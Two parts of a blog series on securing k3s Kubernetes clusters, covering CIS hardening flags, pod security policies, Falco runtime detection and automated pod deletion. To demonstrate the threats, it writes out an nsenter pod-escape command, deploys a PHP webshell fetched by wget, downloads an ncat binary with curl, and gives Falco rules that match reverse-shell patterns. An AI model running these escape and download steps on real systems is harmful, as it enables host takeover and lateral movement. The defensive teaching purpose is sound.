Do you want to know how to securely deploy k3s Kubernetes for production? Have a read of this blog and the accompanying Ansible project for you to run.

The post K3s – lightweight kubernetes made ready for production – Part 3 appeared first on digitalis.io.

- Part 1: Deploying K3s, network and host machine security configuration

- Part 2: K3s Securing the cluster

- Part 3: Creating a security responsive K3s cluster



This is the final post in a three-part blog series on deploying k3s, a certified Kubernetes distribution from SUSE Rancher, in a secure and available fashion. In part 1 we secured the network and host operating system and deployed k3s. In the second part we hardened the cluster further, up to the application level. Now, in the final part, we will leverage some great tools to create a security responsive cluster. Note that a fully working Ansible project, https://github.com/digitalis-io/k3s-on-prem-production, has been made available to deploy and secure k3s for you.

If you would like to know more about how to implement modern data and cloud technologies, such as Kubernetes, into your business, we at Digitalis do it all: from cloud migration to fully managed services, we can help you modernize your operations, data, and applications. We provide consulting and managed services on Kubernetes, cloud, data, and DevOps for any business type. Contact us today for more information or learn more about each of our services here.

Create a security responsive cluster

Introduction

In the previous blog we saw the huge benefits of tidying up our cluster and securing it following the best recommendations from the CIS Benchmark for Kubernetes. We also saw how we cannot cover everything, for example a bad actor stealing the administrator account token for the APIs.

Let’s recap the POD escaping technique used in the previous part using the administrator account

    ~ $ kubectl run hostname-sudo --restart=Never -it --image overriden --overrides '
    {
      "spec": {
        "hostPID": true,
        "hostNetwork": true,
        "containers": [
          {
            "name": "busybox",
            "image": "alpine:3.7",
            "command": ["nsenter", "--mount=/proc/1/ns/mnt", "--", "sh", "-c", "exec /bin/bash"],
            "stdin": true,
            "tty": true,
            "resources": {"requests": {"cpu": "10m"}},
            "securityContext": {
              "privileged": true
            }
          }
        ]
      }
    }' --rm --attach
    If you don't see a command prompt, try pressing enter.
    [root@worker01 /]#

Not good. We could make a specific PSP disallowing for exec but that would hinder the internal use of the privileged account.

Is there anything else we can do?

Enter Falco

No, not this one!

Falco is a cloud-native runtime security project, and is the de facto Kubernetes threat detection engine. Falco was created by Sysdig in 2016 and is the first runtime security project to join CNCF as an incubation-level project. Falco detects unexpected application behavior and alerts on threats at runtime.

And not only that: Falco also monitors our system by parsing the Linux system calls from the kernel (using either a kernel module or eBPF) and uses its powerful rule engine to create alerts.

Installation

Installing it is pretty straightforward

    - name: Install Falco repo /rpm-key
      rpm_key:
        state: present
        key: https://falco.org/repo/falcosecurity-3672BA8F.asc

    - name: Install Falco repo /rpm-repo
      get_url:
        url: https://falco.org/repo/falcosecurity-rpm.repo
        dest: /etc/yum.repos.d/falcosecurity.repo

    - name: Install falco on control plane
      package:
        state: present
        name: falco

    - name: Check if driver is loaded
      shell: |
        set -o pipefail
        lsmod | grep falco
      changed_when: no
      failed_when: no
      register: falco_module

We will install Falco directly on our hosts to have it separated from the kubernetes cluster, having a little more separation between the security layer and the application layer. It can also be installed quite easily as a DaemonSet using their official Helm Chart in case you do not have access to the underlying nodes.

Then we will configure Falco to talk with our APIs by modifying the service file

    [Unit]
    Description=Falco: Container Native Runtime Security
    Documentation=https://falco.org/docs/

    [Service]
    Type=simple
    User=root
    ExecStartPre=/sbin/modprobe falco
    ExecStart=/usr/bin/falco --pidfile=/var/run/falco.pid --k8s-api-cert=/etc/falco/token \
        --k8s-api https://{{ keepalived_ip }}:6443 -pk
    ExecStopPost=/sbin/rmmod falco
    UMask=0077
    # Rest of the file omitted for brevity
    [...]

We will create an admin ServiceAccount and provide the token to Falco to authenticate it for the API calls.



Alerting

We will install in the cluster Falco Sidekick, which is a simple daemon for enhancing available outputs for Falco. It takes a Falco event and forwards it to different outputs. For the sake of simplicity, we will just configure sidekick to notify us on Slack when something is wrong.

It works as a single endpoint for as many falco instances as you want:

In the inventory just set the following variable

falco_sidekick_slack: "https://hooks.slack.com/services/XXXXX-XXXX-XXXX"







# This is a secret and should be Vaulted!Now let’s see what happens when we deploy the previous escaping POD

Enter Kubeless

What can we do with it? We will deploy a python function that will be called by FalcoSidekick when something is happening.

Let’s deploy kubeless on our cluster following the task on roles/k3s-deploy/tasks/kubeless.yml or simply with the command

    ~ $ kubectl apply -f https://github.com/kubeless/kubeless/releases/download/v1.0.8/kubeless-v1.0.8.yaml

And let’s not forget to create corresponding RoleBindings and PSPs for it as it will need some super power to run on our cluster.

After Kubeless deployment is completed we can proceed to deploy our function.

Let’s start simple and just react to a pod Attach or Exec

    # code skipped for brevity
    [ ...]

    def pod_delete(event, context):
        rule = event['data']['rule'] or None
        output_fields = event['data']['output_fields'] or None
        if rule and output_fields:
            if (rule == "Attach/Exec Pod" or rule == "Create HostNetwork Pod"):
                if output_fields['ka.target.name'] and output_fields[
                        'ka.target.namespace']:
                    pod = output_fields['ka.target.name']
                    namespace = output_fields['ka.target.namespace']
                    print(
                        f"Rule: \"{rule}\" fired: Deleting pod \"{pod}\" in namespace \"{namespace}\""
                    )
                    client.CoreV1Api().delete_namespaced_pod(
                        name=pod,
                        namespace=namespace,
                        body=client.V1DeleteOptions(),
                        grace_period_seconds=0
                    )
                    send_slack(
                        rule, pod, namespace, event['data']['output'],
                        time.time_ns()
                    )

Then deploy it to kubeless.

First steps

Let’s try our escaping POD from administrator account again

    ~ $ kubectl run hostname-sudo --restart=Never -it --image overriden --overrides '
    {
      "spec": {
        "hostPID": true,
        "hostNetwork": true,
        "containers": [
          {
            "name": "busybox",
            "image": "alpine:3.7",
            "command": ["nsenter", "--mount=/proc/1/ns/mnt", "--", "sh", "-c", "exec /bin/bash"],
            "stdin": true,
            "tty": true,
            "resources": {"requests": {"cpu": "10m"}},
            "securityContext": {
              "privileged": true
            }
          }
        ]
      }
    }' --rm --attach
    If you don't see a command prompt, try pressing enter.
    [root@worker01 /]#

We will receive this on Slack

And the POD is killed, and the process immediately exited. So we limited the damage by automatically responding in a fast manner to a fishy situation.

Watching the host

Falco will also keep an eye on the base host, alerting if protected files are opened or strange processes, like network scanners, are spawned.

Internet is not a safe place



Exposing our shiny new service running on our new cluster is not all sunshine and roses. We could have done all in our power to secure the cluster, but what if the services deployed in the cluster are vulnerable?







Here in this example we will deploy a PHP website that simulates the presence of a Remote Command Execution (RCE) vulnerability. Those are quite common and not to be underestimated.

A web app with a vulnerability

Let’s deploy this simple service with our non-privileged user

    apiVersion: apps/v1
    kind: Deployment
    metadata:
      name: php
      labels:
        tier: backend
    spec:
      replicas: 1
      selector:
        matchLabels:
          app: php
          tier: backend
      template:
        metadata:
          labels:
            app: php
            tier: backend
        spec:
          automountServiceAccountToken: true
          securityContext:
            runAsNonRoot: true
            runAsUser: 1000
          volumes:
            - name: code
              persistentVolumeClaim:
                claimName: code
          containers:
            - name: php
              image: php:7-fpm
              volumeMounts:
                - name: code
                  mountPath: /code
          initContainers:
            - name: install
              image: busybox
              volumeMounts:
                - name: code
                  mountPath: /code
              command:
                - wget
                - "-O"
                - "/code/index.php"
                - "https://raw.githubusercontent.com/alegrey91/systemd-service-hardening/master/ansible/files/webshell.php"

The file demo/php.yaml will also contain the nginx container to run the app and an external ingress definition for it.

    ~ $ kubectl-user get pods,svc,ingress
    NAME                         READY   STATUS    RESTARTS   AGE
    pod/nginx-64d59b466c-lm8ll   1/1     Running   0          3m9s
    pod/php-66f85644d-2ffbt      1/1     Running   0          3m10s

    NAME                TYPE        CLUSTER-IP    EXTERNAL-IP   PORT(S)    AGE
    service/nginx-php   ClusterIP   10.44.38.54   <none>        8080/TCP   3m9s
    service/php         ClusterIP   10.44.98.87   <none>        9000/TCP   3m10s

    NAME                                             HOSTS                          ADDRESS         PORTS   AGE
    ingress.networking.k8s.io/security-pod-ingress   testweb.192.168.1.200.nip.io   192.168.1.200   80

Adapt our function



Now let’s adapt our function to respond to a more varied selection of rules firing from Falco.

    # code skipped for brevity
    [ ...]

    def pod_delete(event, context):
        rule = event['data']['rule'] or None
        output_fields = event['data']['output_fields'] or None
        if rule and output_fields:
            if (
                rule == "Debugfs Launched in Privileged Container" or
                rule == "Launch Package Management Process in Container" or
                rule == "Launch Remote File Copy Tools in Container" or
                rule == "Launch Suspicious Network Tool in Container" or
                rule == "Mkdir binary dirs" or rule == "Modify binary dirs" or
                rule == "Mount Launched in Privileged Container" or
                rule == "Netcat Remote Code Execution in Container" or
                rule == "Read sensitive file trusted after startup" or
                rule == "Read sensitive file untrusted" or
                rule == "Run shell untrusted" or
                rule == "Sudo Potential Privilege Escalation" or
                rule == "Terminal shell in container" or
                rule == "The docker client is executed in a container" or
                rule == "User mgmt binaries" or
                rule == "Write below binary dir" or
                rule == "Write below etc" or
                rule == "Write below monitored dir" or
                rule == "Write below root" or
                rule == "Create files below dev" or
                rule == "Redirect stdout/stdin to network connection" or
                rule == "Reverse shell" or
                rule == "Code Execution from TMP folder in Container" or
                rule == "Suspect Renamed Netcat Remote Code Execution in Container"
            ):
                if output_fields['k8s.ns.name'] and output_fields['k8s.pod.name']:
                    pod = output_fields['k8s.pod.name']
                    namespace = output_fields['k8s.ns.name']
                    print(
                        f"Rule: \"{rule}\" fired: Deleting pod \"{pod}\" in namespace \"{namespace}\""
                    )
                    client.CoreV1Api().delete_namespaced_pod(
                        name=pod,
                        namespace=namespace,
                        body=client.V1DeleteOptions(),
                        grace_period_seconds=0
                    )
                    send_slack(
                        rule, pod, namespace, event['data']['output'],
                        output_fields['evt.time']
                    )

    # code skipped for brevity
    [ ...]

Complete function file here roles/k3s-deploy/templates/kubeless/falco_function.yaml.j2
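The long `or` chain in the function above can also be written as a set lookup, which makes the rule list easier to groom over time. The following is only a minimal sketch and not the project's code: `DELETE_RULES` and `extract_target` are hypothetical names, just a handful of the rule names are repeated, and the event shape is assumed to match the one `pod_delete` reads.

```python
# Hypothetical refactoring sketch; the names below are illustrative only.
DELETE_RULES = frozenset({
    "Terminal shell in container",
    "Reverse shell",
    "Write below etc",
    "Suspect Renamed Netcat Remote Code Execution in Container",
})


def extract_target(event, rules=DELETE_RULES):
    """Return (pod, namespace) if the event should trigger a deletion, else None."""
    data = event.get("data") or {}
    rule = data.get("rule")
    fields = data.get("output_fields") or {}
    if rule not in rules:
        return None
    pod = fields.get("k8s.pod.name")
    namespace = fields.get("k8s.ns.name")
    # Only act when both identifiers are present in the event.
    if pod and namespace:
        return pod, namespace
    return None
```

Using `.get()` instead of direct indexing means an event with a missing field is ignored rather than raising a `KeyError` inside the function.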

Preparing an attack

What can we do from here? Well first we could try and call the kubernetes APIs, but thanks to our previous hardening steps, anonymous querying is denied and ServiceAccount tokens automount is disabled.



But we can still try and poke around the network! The first thing is to use nmap to scan the surrounding network and see if we can do any lateral movement. Let’s install it!

Never gonna give up

We cannot use the package manager? Well, we can still download a statically linked precompiled binary to use inside the container! In this repo, https://github.com/andrew-d/static-binaries/, we will find a healthy collection of tools that we can use to do naughty things!

Let’s use them. Using this command in the webshell, we will download netcat:

    curl https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/ncat \
        --output nc

Let’s try using the downloaded binary.

We will rename it to unnamedbin. Just launching it to print its help shows that it really works.

Custom rules

Custom rules in Falco are quite straightforward: they are written in YAML rather than a DSL, and the documentation at https://falco.org/docs/ is exhaustive and clearly written.

Let’s try to create a “Suspect Renamed Netcat Remote Code Execution in Container” rule

    - rule: Suspect Renamed Netcat Remote Code Execution in Container
      desc: Netcat Program runs inside container that allows remote code execution
      condition: >
        spawned_process and container and
        ((proc.args contains "ash" or
          proc.args contains "bash" or
          proc.args contains "csh" or
          proc.args contains "ksh" or
          proc.args contains "/bin/sh" or
          proc.args contains "tcsh" or
          proc.args contains "zsh" or
          proc.args contains "dash") and
         (proc.args contains "-e" or
          proc.args contains "-c" or
          proc.args contains "--sh-exec" or
          proc.args contains "--exec" or
          proc.args contains "-c " or
          proc.args contains "--lua-exec"))
      output: >
        Suspect Reverse shell using renamed netcat runs inside container that allows remote code execution (user=%user.name user_loginuid=%user.loginuid
        command=%proc.cmdline container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
      priority: WARNING
      tags: [network, process, mitre_execution]
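To get a feel for what the condition above matches, its two argument checks can be approximated in plain Python. This is a rough sketch under assumptions: `looks_like_netcat_rce` is a hypothetical helper, Falco's `contains` is treated as a simple substring test, and the `spawned_process and container` part of the rule is not modelled at all.

```python
SHELL_MARKERS = ("ash", "bash", "csh", "ksh", "/bin/sh", "tcsh", "zsh", "dash")
EXEC_FLAGS = ("-e", "-c", "--sh-exec", "--exec", "--lua-exec")


def looks_like_netcat_rce(proc_args: str) -> bool:
    """Mimic the rule's two substring checks on the process arguments."""
    has_shell = any(marker in proc_args for marker in SHELL_MARKERS)
    has_exec_flag = any(flag in proc_args for flag in EXEC_FLAGS)
    return has_shell and has_exec_flag


# A typical reverse-shell style invocation matches whatever the binary is called.
print(looks_like_netcat_rce("-lvp 4444 -e /bin/bash"))
# Substring matching is broad, so unrelated arguments can match as well.
print(looks_like_netcat_rce("--dashboard -c cfg"))
```

Because the checks look only at the arguments and never at the process name, renaming the binary to unnamedbin does not change the result. The flip side is that substring matching is broad, so a rule like this is likely to need tuning against false positives.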

Checkpoint

Conclusion

There’s no perfect security, the rule is simple “If it’s connected, it’s vulnerable.”

So it’s our job to always keep an eye on our clusters, enable monitoring and alerting, and groom our set of rules over time. That will make the cluster smarter in dangerous situations, or simply alert us to new things.

This series is not covering other important parts of your application lifecycle, like Docker Image Scanning, Sonarqube integration in your CI/CD pipeline to try and not have vulnerable applications in the cluster in the first place, and operation activities during your cluster lifecycle like defining Network Policies for your deployments and correctly creating Cluster Roles with the “principle of least privilege” always in mind.

This series of posts should give you an idea of the best practices (always evolving) and the risks and responsibilities you have when deploying Kubernetes in an on-premises server room. If you would like help, please reach out!

The full playbook is available in the repo at https://github.com/digitalis-io/k3s-on-prem-production


The post K3s – lightweight kubernetes made ready for production – Part 2 appeared first on digitalis.io.

- Part 1: Deploying K3s, network and host machine security configuration

- Part 2: K3s Securing the cluster

- Part 3: Creating a security responsive K3s cluster

This is part 2 in a three-part blog series on deploying k3s, a certified Kubernetes distribution from SUSE Rancher, in a secure and available fashion. In the previous blog we secured the network and host operating system and deployed k3s. Note that a fully working Ansible project, https://github.com/digitalis-io/k3s-on-prem-production, has been made available to deploy and secure k3s for you.


Introduction

So we have a running K3s cluster, are we done yet (see part 1)? Not at all!

We have secured the underlying machines and we have secured the network using strong segregation, but how about the cluster itself? There is still a lot to think about and handle, so let’s take a look at some dangerous patterns.

Pod escaping

Let’s suppose we want to give someone the edit cluster role permission so that they can deploy pods, but obviously not an administrator account. We expect the account to be just able to stay in its own namespace and not harm the rest of the cluster, right?

Let’s create the user:

    ~ $ kubectl create namespace unprivileged-user
    ~ $ kubectl create serviceaccount -n unprivileged-user fake-user
    ~ $ kubectl create rolebinding -n unprivileged-user fake-editor --clusterrole=edit \
        --serviceaccount=unprivileged-user:fake-user

Obviously the user cannot do much outside of his own namespace

    ~ $ kubectl-user get pods -A
    Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:unprivileged-user:fake-user" cannot list resource "pods" in API group "" at the cluster scope

But let’s say we want to deploy a privileged POD? Are we allowed to? Let’s deploy this

    apiVersion: apps/v1
    kind: Deployment
    metadata:
      labels:
        app: privileged-deploy
      name: privileged-deploy
    spec:
      replicas: 1
      selector:
        matchLabels:
          app: privileged-deploy
      template:
        metadata:
          labels:
            app: privileged-deploy
        spec:
          containers:
            - image: alpine
              name: alpine
              stdin: true
              tty: true
              securityContext:
                privileged: true
          hostPID: true
          hostNetwork: true

This will work flawlessly, and the POD has hostPID, hostNetwork and runs as root.

    ~ $ kubectl-user get pods -n unprivileged-user
    NAME                                READY   STATUS    RESTARTS   AGE
    privileged-deploy-8878b565b-8466r   1/1     Running   0          24m

What can we do now? We can do some nasty things!

Let’s analyse the situation. If we enter the POD, we can see that we have access to all the Host’s processes (thanks to hostPID) and the main network (thanks to hostNetwork).

    ~ $ kubectl-user exec -ti -n unprivileged-user privileged-deploy-8878b565b-8466r -- sh
    / # ps aux | head -n 5
    PID   USER     TIME  COMMAND
        1 root      0:05 /usr/lib/systemd/systemd --switched-root --system --deserialize 16
      574 root      0:01 /usr/lib/systemd/systemd-journald
      605 root      0:00 /usr/lib/systemd/systemd-udevd
      631 root      0:02 /sbin/auditd
    / # ip addr | head -n 10
    1: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq state UP qlen 1000
        link/ether 56:2f:49:03:90:d0 brd ff:ff:ff:ff:ff:ff
        inet 192.168.122.21/24 brd 192.168.122.255 scope global eth0
           valid_lft forever preferred_lft forever

Having root access, we can use the command nsenter to run programs in different namespaces. Which namespace you ask? Well we can use the namespace of PID 1!

    / # nsenter --mount=/proc/1/ns/mnt --net=/proc/1/ns/net --ipc=/proc/1/ns/ipc \
        --uts=/proc/1/ns/uts --cgroup=/proc/1/ns/cgroup -- sh -c /bin/bash
    [root@worker01 /]#

So now we are root on the host node. We escaped the pod and are now able to do whatever we want on the node.

This obviously is a huge hole in the cluster security, and we cannot put the cluster in the hands of anyone and just rely on their good will! Let’s try to set up the cluster better using the CIS Security Benchmark for Kubernetes.

Securing the Kubernetes Cluster

A notable point about K3s is that it already has a number of security mitigations applied and turned on by default, and it will pass a number of the Kubernetes CIS controls without modification, which is a huge plus for us!

We will follow the cluster hardening task in the accompanying Github project roles/k3s-deploy/tasks/cluster_hardening.yml

File Permissions

File permissions are already well set with K3s, but a simple task to ensure files and folders are respectively 0600 and 0700 ensures following the CIS Benchmark rules from 1.1.1 to 1.1.21 (File Permissions)

    # CIS 1.1.1 to 1.1.21
    - name: Cluster Hardening - Ensure folder permission are strict
      command: |
        find {{ item }} -not -path "*containerd*" -exec chmod -c go= {} \;
      register: chmod_result
      changed_when: "chmod_result.stdout != \"\""
      with_items:
        - /etc/rancher
        - /var/lib/rancher

Systemd Hardening

Digging deeper we will first harden our Systemd Service using the isolation capabilities it provides:

File: /etc/systemd/system/k3s-server.service and /etc/systemd/system/k3s-agent.service

    ### Full configuration not displayed for brevity
    [...]
    ###
    # Sandboxing features
    {%if 'libselinux' in ansible_facts.packages %}
    AssertSecurity=selinux
    ConditionSecurity=selinux
    {% endif %}
    LockPersonality=yes
    PrivateTmp=yes
    ProtectHome=yes
    ProtectHostname=yes
    ProtectKernelLogs=yes
    ProtectKernelTunables=yes
    ProtectSystem=full
    ReadWriteDirectories=/var/lib/ /var/run /run /var/log/ /lib/modules /etc/rancher/

This will prevent the spawned process from having write access outside of the designated directories, protects the rest of the system from unwanted reads, protects the Kernel Tunables and Logs and sets up a private Home and TMP directory for the process.

This ensures a minimum layer of isolation between the process and the host. A number of modifications on the host system will be needed to ensure correct operation, in particular setting up sysctl flags that would have been modified by the process instead.

    vm.panic_on_oom=0
    vm.overcommit_memory=1
    kernel.panic=10
    kernel.panic_on_oops=1

File: /etc/sysctl.conf

After this we will be sure that the K3s process will not modify the underlying system, which is a huge win by itself.
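Since the sandboxed process can no longer set these tunables itself, it can be useful to check that the host really carries the expected values. The following is a minimal sketch assuming the standard Linux mapping of a sysctl key such as `vm.overcommit_memory` to `/proc/sys/vm/overcommit_memory`; `sysctl_mismatches` is a hypothetical helper and not part of the playbook.

```python
from pathlib import Path

# Values taken from the sysctl.conf fragment above.
EXPECTED = {
    "vm.panic_on_oom": "0",
    "vm.overcommit_memory": "1",
    "kernel.panic": "10",
    "kernel.panic_on_oops": "1",
}


def sysctl_mismatches(expected=EXPECTED, proc_sys="/proc/sys"):
    """Return {key: actual value or None} for every key that differs."""
    mismatches = {}
    for key, wanted in expected.items():
        # Dots in the key become path separators under /proc/sys.
        path = Path(proc_sys, *key.split("."))
        try:
            actual = path.read_text().strip()
        except OSError:
            actual = None  # missing or unreadable entry
        if actual != wanted:
            mismatches[key] = actual
    return mismatches
```

An empty dictionary means every listed tunable already has the expected value on that host.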

CIS Hardening Flags

We are now on the application level, and here K3s comes to meet us being already set up with sane defaults for file permissions and service setups.

1 – Restrict TLS Ciphers to the strongest one and FIPS-140 approved ciphers

SSL, in an appropriate environment should comply with the Federal Information Processing Standard (FIPS) Publication 140-2

    --kube-apiserver-arg=tls-min-version=VersionTLS12 \
    --kube-apiserver-arg=tls-cipher-suites=TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256,TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384,TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384,TLS_RSA_WITH_AES_128_GCM_SHA256,TLS_RSA_WITH_AES_256_GCM_SHA384 \

File: /etc/systemd/system/k3s-server.service

    --kubelet-arg=tls-cipher-suites=TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256,TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384,TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384,TLS_RSA_WITH_AES_128_GCM_SHA256,TLS_RSA_WITH_AES_256_GCM_SHA384 \

File: /etc/systemd/system/k3s-server.service and /etc/systemd/system/k3s-agent.service
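The same cipher list appears in both the API server and the kubelet flags, so it is easy for the two to drift apart when edited by hand. As an illustration only, the flags could be rendered from a single list; `tls_args` is a hypothetical helper, and the playbook itself may template these differently.

```python
# Cipher suites copied from the flags above.
CIPHERS = [
    "TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256",
    "TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384",
    "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
    "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
    "TLS_RSA_WITH_AES_128_GCM_SHA256",
    "TLS_RSA_WITH_AES_256_GCM_SHA384",
]


def tls_args(ciphers=CIPHERS, min_version="VersionTLS12"):
    """Build the k3s TLS flags from one shared cipher list."""
    joined = ",".join(ciphers)
    return [
        f"--kube-apiserver-arg=tls-min-version={min_version}",
        f"--kube-apiserver-arg=tls-cipher-suites={joined}",
        f"--kubelet-arg=tls-cipher-suites={joined}",
    ]
```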

2 – Enable cluster secret encryption at rest

Where etcd encryption is used, it is important to ensure that the appropriate set of encryption providers is used.

    --kube-apiserver-arg='encryption-provider-config=/etc/k3s-encryption.yaml' \

File: /etc/systemd/system/k3s-server.service

    apiVersion: apiserver.config.k8s.io/v1
    kind: EncryptionConfiguration
    resources:
      - resources:
          - secrets
        providers:
          - aescbc:
              keys:
                - name: key1
                  secret: {{ k3s_encryption_secret }}
          - identity: {}

File: /etc/k3s-encryption.yaml
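The `k3s_encryption_secret` value referenced above is a base64-encoded random key. As a hedged sketch, it could be produced with Python's standard library in the same spirit as the shell one-liner that follows; the function name is illustrative and not part of the playbook.

```python
import base64
import secrets


def generate_encryption_secret(num_bytes: int = 32) -> str:
    """Return num_bytes of CSPRNG output, base64-encoded as ASCII text."""
    return base64.b64encode(secrets.token_bytes(num_bytes)).decode("ascii")


if __name__ == "__main__":
    # Print a fresh key; store it in a vault rather than in plain text.
    print(generate_encryption_secret())
```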

To generate an encryption secret just run

    ~ $ head -c 32 /dev/urandom | base64

3 – Enable Admission Plugins for Pod Security Policies and Network Policies

The runtime requirements to comply with the CIS Benchmark are centered around pod security (PSPs) and network policies. By default, K3s runs with the “NodeRestriction” admission controller. With the following we will enable all the Admission Plugins requested by the CIS Benchmark compliance:

    --kube-apiserver-arg='enable-admission-plugins=AlwaysPullImages,DefaultStorageClass,DefaultTolerationSeconds,LimitRanger,MutatingAdmissionWebhook,NamespaceLifecycle,NodeRestriction,PersistentVolumeClaimResize,PodSecurityPolicy,Priority,ResourceQuota,ServiceAccount,TaintNodesByCondition,ValidatingAdmissionWebhook' \

File: /etc/systemd/system/k3s-server.service

4 – Enable APIs auditing

Auditing the Kubernetes API Server provides a security-relevant, chronological set of records documenting the sequence of activities that have affected the system, whether by individual users, administrators or other components of the system.

    --kube-apiserver-arg=audit-log-maxage=30 \
    --kube-apiserver-arg=audit-log-maxbackup=30 \
    --kube-apiserver-arg=audit-log-maxsize=30 \
    --kube-apiserver-arg=audit-log-path=/var/lib/rancher/audit/audit.log \

File: /etc/systemd/system/k3s-server.service
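Once the audit log is being written, it can be searched for interesting activity. The sketch below assumes the log is in the API server's JSON-lines format (one `audit.k8s.io` event per line) and picks out pod `exec` and `attach` requests; `find_exec_events` is a hypothetical helper, not something shipped with the playbook.

```python
import json


def find_exec_events(lines):
    """Yield (user, namespace, pod, subresource) for pod exec/attach audit events."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip partially written or corrupt lines
        ref = event.get("objectRef") or {}
        if ref.get("resource") == "pods" and ref.get("subresource") in ("exec", "attach"):
            user = (event.get("user") or {}).get("username")
            yield user, ref.get("namespace"), ref.get("name"), ref["subresource"]
```

It could be used as `for hit in find_exec_events(open("/var/lib/rancher/audit/audit.log")): print(hit)`, given read access to the log path configured above.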

5 – Harden APIs

If --service-account-lookup is not enabled, the apiserver only verifies that the authentication token is valid, and does not validate that the service account token mentioned in the request is actually present in etcd. This allows using a service account token even after the corresponding service account is deleted. This is an example of a time-of-check to time-of-use security issue.

Also APIs should never allow anonymous querying on either the apiserver or kubelet side.

    --kube-apiserver-arg='service-account-lookup=true' \
    --kube-apiserver-arg=anonymous-auth=false \
    --kubelet-arg='anonymous-auth=false' \
    --kube-controller-manager-arg='use-service-account-credentials=true' \
    --kube-apiserver-arg='request-timeout=300s' \
    --kubelet-arg='streaming-connection-idle-timeout=5m' \
    --kube-controller-manager-arg='terminated-pod-gc-threshold=10' \

File: /etc/systemd/system/k3s-server.service

6 – Do not schedule Pods on Masters

By default K3s does not distinguish between control-plane and worker nodes like full Kubernetes does, and it schedules PODs even on master nodes.

This is not recommended on a production multi-node and multi-master environment, so we will prevent this by adding the following flag

    --node-taint CriticalAddonsOnly=true:NoExecute \

File: /etc/systemd/system/k3s-server.service

Where are we now?

We now have a quite well set up cluster both node-wise and service-wise, but are we done yet?

Not really, we have auditing and we have enabled a bunch of admission controllers, but the previous deployment still works because we are still missing an important piece of the puzzle.

PodSecurityPolicies

1 – Privileged Policies

First we will create a system-unrestricted PSP, this will be used by the administrator account and the kube-system namespace, for the legitimate privileged workloads that can be useful for the cluster.

Let’s define it in roles/k3s-deploy/files/policy/system-psp.yaml

    apiVersion: policy/v1beta1
    kind: PodSecurityPolicy
    metadata:
      name: system-unrestricted-psp
    spec:
      privileged: true
      allowPrivilegeEscalation: true
      allowedCapabilities:
        - '*'
      volumes:
        - '*'
      hostNetwork: true
      hostPorts:
        - min: 0
          max: 65535
      hostIPC: true
      hostPID: true
      runAsUser:
        rule: 'RunAsAny'
      seLinux:
        rule: 'RunAsAny'
      supplementalGroups:
        rule: 'RunAsAny'
      fsGroup:
        rule: 'RunAsAny'

So we are allowing PODs with this PSP to be run as root and to have hostIPC, hostPID and hostNetwork.

This will be valid only for cluster-nodes and for the kube-system namespace; we will define the corresponding ClusterRole and ClusterRoleBinding for these entities in the playbook.

2 – Unprivileged Policies

For the rest of the users and namespaces we want to limit the PODs capabilities as much as possible. We will provide the following PSP in roles/k3s-deploy/files/policy/restricted-psp.yaml

    apiVersion: policy/v1beta1
    kind: PodSecurityPolicy
    metadata:
      name: global-restricted-psp
      annotations:
        seccomp.security.alpha.kubernetes.io/allowedProfileNames: 'docker/default,runtime/default' # CIS - 5.7.2
        seccomp.security.alpha.kubernetes.io/defaultProfileName: 'runtime/default' # CIS - 5.7.2
    spec:
      privileged: false # CIS - 5.2.1
      allowPrivilegeEscalation: false # CIS - 5.2.5
      requiredDropCapabilities: # CIS - 5.2.7/8/9
        - ALL
      volumes:
        - 'configMap'
        - 'emptyDir'
        - 'projected'
        - 'secret'
        - 'downwardAPI'
        - 'persistentVolumeClaim'
      forbiddenSysctls:
        - '*'
      hostPID: false # CIS - 5.2.2
      hostIPC: false # CIS - 5.2.3
      hostNetwork: false # CIS - 5.2.4
      runAsUser:
        rule: 'MustRunAsNonRoot' # CIS - 5.2.6
      seLinux:
        rule: 'RunAsAny'
      supplementalGroups:
        rule: 'MustRunAs'
        ranges:
          - min: 1
            max: 65535
      fsGroup:
        rule: 'MustRunAs'
        ranges:
          - min: 1
            max: 65535
      readOnlyRootFilesystem: false

We are now disallowing privileged containers, hostPID, hostIPC and hostNetwork; we are forcing the container to run with a non-root user and applying the default seccomp profile for docker containers, whitelisting only a restricted and well-known amount of syscalls in them.

We will create the corresponding ClusterRole and ClusterRoleBindings in the playbook, enforcing this PSP to any system:serviceaccounts, system:authenticated and system:unauthenticated.
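To make the effect of the restricted policy more concrete, here is a small sketch that flags the same pod-level settings in a pod spec given as a plain dictionary. It is an illustration only: `restricted_violations` is a hypothetical helper that covers a few of the PSP fields, and the real admission controller checks far more (users, volumes, capabilities, seccomp) and also applies defaults.

```python
def restricted_violations(pod_spec: dict) -> list:
    """List the reasons a pod spec would conflict with the restricted policy."""
    violations = []
    # Pod-level host namespace sharing is forbidden by the policy.
    for field in ("hostPID", "hostIPC", "hostNetwork"):
        if pod_spec.get(field):
            violations.append(f"{field} is not allowed")
    # Container-level privilege settings are forbidden as well.
    for container in pod_spec.get("containers", []):
        ctx = container.get("securityContext") or {}
        name = container.get("name", "<unnamed>")
        if ctx.get("privileged"):
            violations.append(f"container {name}: privileged is not allowed")
        if ctx.get("allowPrivilegeEscalation"):
            violations.append(f"container {name}: allowPrivilegeEscalation is not allowed")
    return violations
```

Feeding it the `spec` of the escaping POD used in this series reports hostPID, hostNetwork and the privileged container, the same three settings the policy is designed to reject.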

3 – Disable default service accounts by default

We also want to disable automountServiceAccountToken for all namespaces. By default kubernetes enables it and any POD will mount the default service account token inside it in /var/run/secrets/kubernetes.io/serviceaccount/token. This is also dangerous as reading this will automatically give the attacker the possibility to query the kubernetes APIs being authenticated.
